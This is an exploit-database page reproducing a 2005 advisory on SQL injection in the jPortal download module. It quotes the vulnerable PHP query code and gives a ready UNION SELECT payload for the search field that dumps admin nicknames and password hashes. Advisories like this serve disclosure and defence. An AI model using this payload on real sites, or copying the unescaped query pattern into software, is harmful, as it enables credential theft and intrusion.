Advertisement






Sql injection in jPortal (module download)

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2005-10-06
CPE PURL
cpe:cpe:/a:jportal:module pkg:pkg:hex/[email protected]
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005090017

Below is a copy:

Versions: all from 2.2.1 to 2.3.1(+Service Pack)+shop jportal(I check this bug only on one site)

SQL injection attack
if magic_quotes_qpc=Off

Problem is in file serching engine (download.php), witch code is in ?module/down.inc.php? file:

<code>
if($cat=='all') {
$q_ = "AND title LIKE '%$word%'";
} else {
$q_ = "AND category LIKE '%-$cat-%' AND title LIKE '%$word%'";
}

$query = "SELECT * FROM $file_b_tbl WHERE stat<>5 $q_";
$result = mysql_query($query);
</code>

In $q query we have simple SQL Injection attack (variable $word we take from ?search? field) then In field ?Where I should search? ($cat) we SET ?everywhere?.  And now we need this query ($query) to attack:

$query = "SELECT * FROM file_data WHERE stat<>5 AND title LIKE '%a%' UNION SELECT NULL , NULL , nick , pass, NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL FROM admins/*%'";
Exploits:
SQL injection attack
-http://www.page.info/download.php
We write in ?search? field:
a%' UNION SELECT NULL , NULL , nick , pass, NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL FROM admins/*

We push ?Find? button and we get list of admins and users with coding passwords.

krasza
http://www.krewniacy.pl

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum